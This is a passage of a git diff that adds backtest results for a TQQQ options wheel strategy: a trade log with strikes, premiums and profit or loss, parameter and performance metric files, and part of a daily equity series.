"2023-11-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 17.37, + "spot": 18.99580955505371, + "premium": 0.25301105306378524, + "close_cost": 0.12482886242702351, + "pnl": 6.838219063676172, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2023-11-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 18.46, + "spot": 20.872055053710938, + "premium": 0.29332598753469874, + "close_cost": 0.08608607004532187, + "pnl": 14.743991748937685, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-01-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.09, + "spot": 23.8001766204834, + "premium": 0.12668356236508016, + "close_cost": 0.0003487592221401714, + "pnl": 6.653480314293999, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-01-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.52, + "spot": 24.429969787597656, + "premium": 0.15674734561283277, + "close_cost": 0.06725268429805364, + "pnl": 2.969466131477912, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-01-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 23.09, + "spot": 25.172046661376953, + "premium": 0.13557618285315343, + "close_cost": 0.04083128435259198, + "pnl": 3.4944898500561443, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-02-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.16, + "spot": 26.607379913330078, + "premium": 0.19947329834256777, + "close_cost": 0.05356146538708173, + "pnl": 8.611183295548603, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-02-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.04, + "spot": 28.579742431640625, + "premium": 0.2521820450388468, + "close_cost": 0.09035638617245612, + "pnl": 10.202565886639068, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-02-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.74, + "spot": 29.375518798828125, + "premium": 0.2107043321928277, + "close_cost": 0.02959364703684808, + "pnl": 12.13106851559796, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-02-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.49, + "spot": 29.468284606933594, + "premium": 0.3288692430475395, + "close_cost": 0.13676223718978253, + "pnl": 13.230700585775697, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-03-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.09, + "spot": 30.664392471313477, + "premium": 0.29630503535239505, + "close_cost": 0.03435946611475105, + "pnl": 20.214556923764402, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-03-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.4, + "spot": 28.99471664428711, + "premium": 0.385988922645371, + "close_cost": 0.1547327224120627, + "pnl": 17.145620023330828, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-03-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.44, + "spot": 30.231168746948242, + "premium": 0.33860635166218955, + "close_cost": 0.13295871255331448, + "pnl": 14.584763910887506, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-04-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.28, + "spot": 30.34876251220703, + "premium": 0.24281183179998678, + "close_cost": 0.0006781752938372076, + "pnl": 18.233365650614957, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-04-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.76, + "spot": 29.731403350830078, + "premium": 0.19864000350490674, + "close_cost": 0.09195610059476866, + "pnl": 4.688390291013807, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-04-11 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.87, + "spot": 30.231168746948242, + "premium": 0.1314968635492315, + "close_cost": 0.03716441872662557, + "pnl": 3.453244482260594, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-04-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.69, + "spot": 26.061521530151367, + "premium": 0.1753488457691832, + "close_cost": 0.0, + "pnl": 11.554884576918319, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2024-04-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.5, + "spot": 27.08555793762207, + "premium": 0.2620810823874242, + "close_cost": 0.046312624963059434, + "pnl": 15.596845742436479, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-05-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.29, + "spot": 26.218311309814453, + "premium": 0.33708771454217246, + "close_cost": 0.16558444312233567, + "pnl": 11.17032714198368, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-05-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.97, + "spot": 28.991544723510742, + "premium": 0.4305165718907613, + "close_cost": 0.13227884898719733, + "pnl": 23.843772290356398, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-05-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.94, + "spot": 31.098419189453125, + "premium": 0.31617291244159773, + "close_cost": 0.0820109649323677, + "pnl": 17.436194750923004, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-06-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.83, + "spot": 30.936729431152344, + "premium": 0.11801775394874969, + "close_cost": 0.002762488974923205, + "pnl": 5.545526497382648, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-06-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.11, + "spot": 36.394996643066406, + "premium": 0.1653596465226146, + "close_cost": 0.039127761115247184, + "pnl": 6.643188540736741, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-07-12 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.69, + "spot": 39.66231918334961, + "premium": 0.24589626579027524, + "close_cost": 0.10430722379838109, + "pnl": 8.178904199189414, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-07-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.77, + "spot": 36.47517013549805, + "premium": 0.3572453643803266, + "close_cost": 0.07405543276080628, + "pnl": 22.338993161952033, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-07-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 29.25, + "spot": 32.19612503051758, + "premium": 0.5102510793542496, + "close_cost": 0.074443578168927, + "pnl": 37.60075011853226, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-08-08 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 29.29, + "spot": 28.55647850036621, + "premium": 0.7010706116373804, + "close_cost": 0.7335214996337882, + "pnl": -6.235088799640783, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-08-15 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 29.13, + "spot": 33.671661376953125, + "premium": 1.3443929218833262, + "close_cost": 4.541661376953126, + "pnl": -322.71684550698, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-08-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.65, + "spot": 35.06849670410156, + "premium": 1.0726093467750317, + "close_cost": 0.2317729280427434, + "pnl": 78.10364187322882, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-08-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.61, + "spot": 33.671661376953125, + "premium": 0.9025333987399904, + "close_cost": 0.40030039966873776, + "pnl": 44.24329990712526, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-08-30 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 30.68, + "spot": 33.74543380737305, + "premium": 0.7006666469634997, + "close_cost": 0.30126643667670017, + "pnl": 33.96002102867995, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-09-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.67, + "spot": 29.85494613647461, + "premium": 0.5583216694304518, + "close_cost": 0.25136531531858264, + "pnl": 24.715635411186916, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2024-09-16 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 30.74, + "spot": 32.683048248291016, + "premium": 0.6174757469756766, + "close_cost": 0.20180647167188948, + "pnl": 35.586927530378716, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-09-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.63, + "spot": 34.74879837036133, + "premium": 0.6367595515683835, + "close_cost": 0.21373822998126624, + "pnl": 36.322132158711725, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-09-30 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.95, + "spot": 35.76860809326172, + "premium": 0.5650585144938596, + "close_cost": 0.2668854435764265, + "pnl": 23.837307091743305, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-10-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.24, + "spot": 35.51203155517578, + "premium": 0.3887764564468892, + "close_cost": 0.06320469614601976, + "pnl": 26.577176030086942, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-10-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 34.37, + "spot": 37.59922790527344, + "premium": 0.22206165347401274, + "close_cost": 0.011170874416824406, + "pnl": 15.109077905718834, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-10-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.3, + "spot": 36.26697540283203, + "premium": 0.19186371048025297, + "close_cost": 0.06901254031154913, + "pnl": 6.305117016870383, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-11-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.21, + "spot": 34.99885559082031, + "premium": 0.2972695736232076, + "close_cost": 0.12918871931240528, + "pnl": 10.828085431080233, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-11-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.13, + "spot": 38.092655181884766, + "premium": 0.43020968545040184, + "close_cost": 0.17248409741390525, + "pnl": 19.79255880364966, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-11-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.16, + "spot": 38.78839111328125, + "premium": 0.4931513518335091, + "close_cost": 0.12697060799143234, + "pnl": 30.638074384207673, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-12-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.05, + "spot": 40.697959899902344, + "premium": 0.3498505115059283, + "close_cost": 0.05440131131299397, + "pnl": 23.564920019293428, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-12-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.59, + "spot": 44.11248016357422, + "premium": 0.30722181455396935, + "close_cost": 0.1262852017138698, + "pnl": 12.113661284009954, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-12-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.54, + "spot": 40.969337463378906, + "premium": 0.47785603181040237, + "close_cost": 0.23465262136836618, + "pnl": 18.34034104420362, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-01-02 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 41.07, + "spot": 38.92718505859375, + "premium": 0.5758441629633673, + "close_cost": 2.1428149414062503, + "pnl": -159.6870778442883, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-01-10 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 39.71, + "spot": 38.03606414794922, + "premium": 1.1539370143830947, + "close_cost": 0.0, + "pnl": 109.41370143830947, + "hold_days": 8, + "result": "Win" + }, + { + "date": "2025-01-17 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 38.8, + "spot": 41.159942626953125, + "premium": 1.2706659413941264, + "close_cost": 2.359942626953128, + "pnl": -111.91766855590014, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-01-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.69, + "spot": 41.843135833740234, + "premium": 0.7541480199745383, + "close_cost": 0.09637341425902468, + "pnl": 59.797460571551355, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-01-31 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.37, + "spot": 40.95201110839844, + "premium": 0.5349361579062073, + "close_cost": 0.0, + "pnl": 47.51361579062073, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-02-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.49, + "spot": 41.41242599487305, + "premium": 0.6050736393249689, + "close_cost": 0.15354770602327594, + "pnl": 39.17259333016929, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-02-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.5, + "spot": 42.39760971069336, + "premium": 0.5489755728222274, + "close_cost": 0.09381663937623808, + "pnl": 39.53589334459893, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-02-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.8, + "spot": 44.749183654785156, + "premium": 0.4665354770431396, + "close_cost": 0.09728726355701411, + "pnl": 30.944821348612546, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-02-28 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.96, + "spot": 37.09048080444336, + "premium": 0.4533980900662211, + "close_cost": 1.8695191955566415, + "pnl": -144.60211054904204, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-03-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 37.83, + "spot": 34.694358825683594, + "premium": 0.9698374390220561, + "close_cost": 0.1365982318150123, + "pnl": 77.34392072070438, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-03-10 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 35.39, + "spot": 29.61001205444336, + "premium": 0.9927947712487981, + "close_cost": 0.0, + "pnl": 93.2994771248798, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-03-17 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 30.2, + "spot": 31.23383331298828, + "premium": 1.1216170740944023, + "close_cost": 1.033833312988282, + "pnl": 5.788376110612029, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-03-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 29.36, + "spot": 32.73883819580078, + "premium": 0.7427745803809369, + "close_cost": 0.0, + "pnl": 68.2974580380937, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-03-31 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 30.77, + "spot": 28.451080322265625, + "premium": 0.8759670482703168, + "close_cost": 2.3189196777343746, + "pnl": -147.2852629464058, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-04-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 29.02, + "spot": 24.97538185119629, + "premium": 1.1985382133782245, + "close_cost": 0.1267667761886413, + "pnl": 101.19714371895832, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-04-04 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 25.47, + "spot": 20.402353286743164, + "premium": 1.2617948816111983, + "close_cost": 0.14710830523223617, + "pnl": 105.48865763789621, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-04-11 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 20.81, + "spot": 24.12135124206543, + "premium": 1.2512472548902789, + "close_cost": 3.311351242065431, + "pnl": -209.00039871751522, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-04-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.67, + "spot": 24.722152709960938, + "premium": 1.8845621389953475, + "close_cost": 0.8536547202365341, + "pnl": 97.11074187588135, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-04-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 19.54, + "spot": 23.858192443847656, + "premium": 1.6562021427062854, + "close_cost": 0.5767803264061984, + "pnl": 101.9621816300087, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2025-05-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.12, + "spot": 28.18791961669922, + "premium": 2.178156040602474, + "close_cost": 1.0562061799709515, + "pnl": 106.21498606315224, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-05-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.26, + "spot": 29.34979820251465, + "premium": 1.9102957306270394, + "close_cost": 0.4027422953359183, + "pnl": 144.77534352911212, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-05-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.71, + "spot": 35.22372817993164, + "premium": 0.47503560969541603, + "close_cost": 0.0005443730963770946, + "pnl": 41.469123659903886, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2025-06-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.69, + "spot": 35.55640411376953, + "premium": 0.498169389331375, + "close_cost": 0.03134308638952921, + "pnl": 40.70263029418457, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-10-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 48.35, + "spot": 53.771759033203125, + "premium": 0.5454113698995897, + "close_cost": 0.007119091985766268, + "pnl": 47.84922779138235, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-10-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 49.0, + "spot": 53.437835693359375, + "premium": 0.5796138664200132, + "close_cost": 0.27775405740060854, + "pnl": 24.205980901940467, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-11-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 53.92, + "spot": 58.97001266479492, + "premium": 0.8310872799165008, + "close_cost": 0.11816318541265058, + "pnl": 65.31240945038502, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-11-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 50.08, + "spot": 56.17401885986328, + "premium": 0.9419560347662923, + "close_cost": 0.02374044958327315, + "pnl": 85.84155851830191, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-11-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 49.03, + "spot": 49.864349365234375, + "premium": 0.7034800368865071, + "close_cost": 0.3489519252090876, + "pnl": 29.47281116774195, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2025-11-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 43.52, + "spot": 50.91596603393555, + "premium": 0.7094021584322991, + "close_cost": 0.010778629045536614, + "pnl": 63.88235293867625, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 51.1, + "spot": 55.12240982055664, + "premium": 0.8885543779888483, + "close_cost": 0.22771800847670587, + "pnl": 60.10363695121424, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 52.61, + "spot": 55.83012390136719, + "premium": 0.7019645425702343, + "close_cost": 0.1930723601146349, + "pnl": 44.90921824555994, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 46.29, + "spot": 51.34457778930664, + "premium": 0.5344252451993174, + "close_cost": 0.181495753739374, + "pnl": 29.31294914599434, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2026-02-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.48, + "spot": 51.654598236083984, + "premium": 0.5631882299256876, + "close_cost": 0.13619518544464349, + "pnl": 36.71930444810441, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-02-17 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 45.49, + "spot": 48.27019119262695, + "premium": 0.5999675089349932, + "close_cost": 0.22028255990625123, + "pnl": 31.988494902874198, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2026-02-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 46.72, + "spot": 51.78438186645508, + "premium": 0.5420435636602043, + "close_cost": 0.18373995818888744, + "pnl": 29.85036054713169, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2026-03-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 45.14, + "spot": 50.17703628540039, + "premium": 0.5493659811993616, + "close_cost": 0.16897163249998304, + "pnl": 32.05943486993786, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2026-03-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.43, + "spot": 44.496429443359375, + "premium": 0.4571711027535059, + "close_cost": 0.07888536647135913, + "pnl": 31.848573628214677, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-03-31 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.45, + "spot": 41.68000030517578, + "premium": 0.4899103648679599, + "close_cost": 0.032759820956997254, + "pnl": 39.73505439109627, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2026-04-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.45, + "spot": 48.0, + "premium": 0.7825883684419885, + "close_cost": 0.12738446714409735, + "pnl": 59.54039012978912, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2026-04-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.62, + "spot": 53.40999984741211, + "premium": 1.0000270235383635, + "close_cost": 0.3787688574986454, + "pnl": 56.14581660397181, + "hold_days": 1, + "result": "Win" + } + ], + "underlying_ticker": "TQQQ", + "signal_ticker": "QQQ", + "style": "aggressive" + }, + "start": "2021-04-01", + "end": "2026-04-24", + "_updated_at": "2026-04-24 20:54:23" +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/charts/drawdown.png b/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/charts/drawdown.png new file mode 100644 index 0000000..170dfc9 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/charts/drawdown.png differ diff --git a/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/charts/equity.png b/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/charts/equity.png new file mode 100644 index 0000000..615f0c7 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/charts/equity.png differ diff --git a/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/charts/indicators.png b/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/charts/indicators.png new file mode 100644 index 0000000..33d96b2 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/charts/indicators.png differ diff --git a/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/charts/monthly.png b/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/charts/monthly.png new file mode 100644 index 0000000..ad3b696 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/charts/monthly.png differ diff --git a/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/meta.json b/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/meta.json new file mode 100644 index 0000000..f25b93b --- /dev/null +++ b/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/meta.json @@ -0,0 +1,13 @@ +{ + "start": "2025-04-24", + "end": "2026-04-24", + "style": "neutral", + "underlying_ticker": "TQQQ", + "signal_ticker": "QQQ", + "put_otm_pct": 9.0, + "call_otm_pct": 6.0, + "put_tp_pct": 50.0, + "call_tp_pct": 50.0, + "put_sl_pct": 200.0, + "call_sl_pct": null +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/metrics.json b/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/metrics.json new file mode 100644 index 0000000..c62ab12 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/metrics.json @@ -0,0 +1,15 @@ +{ + "total_return": 3.2482335125425754, + "final_value": 10324.823351254257, + "cagr": 3.259568016903991, + "sharpe": 0.09896699284613594, + "max_dd": -2.619957219409812, + "n_trades": 9, + "wins": 7, + "losses": 2, + "win_rate": 77.77777777777779, + "avg_win": 55.310639861806635, + "avg_loss": -181.81293525279108, + "chain_quotes": 0, + "bs_quotes": 37 +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/series.json b/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/series.json new file mode 100644 index 0000000..067dcaf --- /dev/null +++ b/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/series.json @@ -0,0 +1,6088 @@ +{ + "equity": [ + [ + "2025-04-24", + 10001.173037138344 + ], + [ + "2025-04-25", + 10002.3462118783 + ], + [ + "2025-04-28", + 10003.519524236011 + ], + [ + "2025-04-29", + 10004.692974227619 + ], + [ + "2025-04-30", + 10005.866561869268 + ], + [ + "2025-05-01", + 10007.040287177108 + ], + [ + "2025-05-02", + 10008.214150167285 + ], + [ + "2025-05-05", + 10009.38815085595 + ], + [ + "2025-05-06", + 10010.562289259256 + ], + [ + "2025-05-07", + 10011.736565393358 + ], + [ + "2025-05-08", + 10012.910979274411 + ], + [ + "2025-05-09", + 10014.085530918574 + ], + [ + "2025-05-12", + 10015.260220342007 + ], + [ + "2025-05-13", + 10016.435047560872 + ], + [ + "2025-05-14", + 10017.610012591333 + ], + [ + "2025-05-15", + 10018.785115449555 + ], + [ + "2025-05-16", + 10019.960356151707 + ], + [ + "2025-05-19", + 10021.135734713958 + ], + [ + "2025-05-20", + 10022.31125115248 + ], + [ + "2025-05-21", + 10023.486905483445 + ], + [ + "2025-05-22", + 10024.66269772303 + ], + [ + "2025-05-23", + 10025.83862788741 + ], + [ + "2025-05-27", + 10027.014695992766 + ], + [ + "2025-05-28", + 10028.19090205528 + ], + [ + "2025-05-29", + 10029.367246091131 + ], + [ + "2025-05-30", + 10030.543728116507 + ], + [ + "2025-06-02", + 10031.720348147594 + ], + [ + "2025-06-03", + 10032.89710620058 + ], + [ + "2025-06-04", + 10034.074002291656 + ], + [ + "2025-06-05", + 10035.251036437016 + ], + [ + "2025-06-06", + 10036.428208652851 + ], + [ + "2025-06-09", + 10037.605518955359 + ], + [ + "2025-06-10", + 10038.782967360738 + ], + [ + "2025-06-11", + 10039.960553885187 + ], + [ + "2025-06-12", + 10041.138278544908 + ], + [ + "2025-06-13", + 10042.316141356107 + ], + [ + "2025-06-16", + 10043.494142334986 + ], + [ + "2025-06-17", + 10044.672281497757 + ], + [ + "2025-06-18", + 10045.850558860626 + ], + [ + "2025-06-20", + 10047.028974439807 + ], + [ + "2025-06-23", + 10048.20752825151 + ], + [ + "2025-06-24", + 10049.386220311953 + ], + [ + "2025-06-25", + 10050.565050637353 + ], + [ + "2025-06-26", + 10051.744019243928 + ], + [ + "2025-06-27", + 10052.923126147898 + ], + [ + "2025-06-30", + 10054.102371365487 + ], + [ + "2025-07-01", + 10055.28175491292 + ], + [ + "2025-07-02", + 10056.461276806422 + ], + [ + "2025-07-03", + 10057.640937062224 + ], + [ + "2025-07-07", + 10058.820735696554 + ], + [ + "2025-07-08", + 10060.000672725646 + ], + [ + "2025-07-09", + 10061.180748165734 + ], + [ + "2025-07-10", + 10062.360962033054 + ], + [ + "2025-07-11", + 10063.541314343844 + ], + [ + "2025-07-14", + 10064.721805114343 + ], + [ + "2025-07-15", + 10065.902434360793 + ], + [ + "2025-07-16", + 10067.083202099438 + ], + [ + "2025-07-17", + 10068.264108346526 + ], + [ + "2025-07-18", + 10069.4451531183 + ], + [ + "2025-07-21", + 10070.626336431013 + ], + [ + "2025-07-22", + 10071.807658300915 + ], + [ + "2025-07-23", + 10072.98911874426 + ], + [ + "2025-07-24", + 10074.170717777304 + ], + [ + "2025-07-25", + 10075.352455416301 + ], + [ + "2025-07-28", + 10076.534331677512 + ], + [ + "2025-07-29", + 10077.7163465772 + ], + [ + "2025-07-30", + 10078.898500131623 + ], + [ + "2025-07-31", + 10080.080792357048 + ], + [ + "2025-08-01", + 10081.263223269743 + ], + [ + "2025-08-04", + 10082.445792885976 + ], + [ + "2025-08-05", + 10083.628501222016 + ], + [ + "2025-08-06", + 10084.811348294137 + ], + [ + "2025-08-07", + 10085.994334118612 + ], + [ + "2025-08-08", + 10087.177458711718 + ], + [ + "2025-08-11", + 10088.360722089732 + ], + [ + "2025-08-12", + 10089.544124268934 + ], + [ + "2025-08-13", + 10090.727665265607 + ], + [ + "2025-08-14", + 10091.911345096036 + ], + [ + "2025-08-15", + 10093.095163776503 + ], + [ + "2025-08-18", + 10094.279121323298 + ], + [ + "2025-08-19", + 10095.463217752711 + ], + [ + "2025-08-20", + 10093.657453081032 + ], + [ + "2025-08-21", + 10085.143119754184 + ], + [ + "2025-08-22", + 10114.051238323495 + ], + [ + "2025-08-25", + 10119.23913517023 + ], + [ + "2025-08-26", + 10126.192359432824 + ], + [ + "2025-08-27", + 10127.380199403588 + ], + [ + "2025-08-28", + 10128.56817871239 + ], + [ + "2025-08-29", + 10129.75629737558 + ], + [ + "2025-09-02", + 10130.9445554095 + ], + [ + "2025-09-03", + 10132.1329528305 + ], + [ + "2025-09-04", + 10133.32148965493 + ], + [ + "2025-09-05", + 10134.510165899146 + ], + [ + "2025-09-08", + 10135.698981579499 + ], + [ + "2025-09-09", + 10136.887936712346 + ], + [ + "2025-09-10", 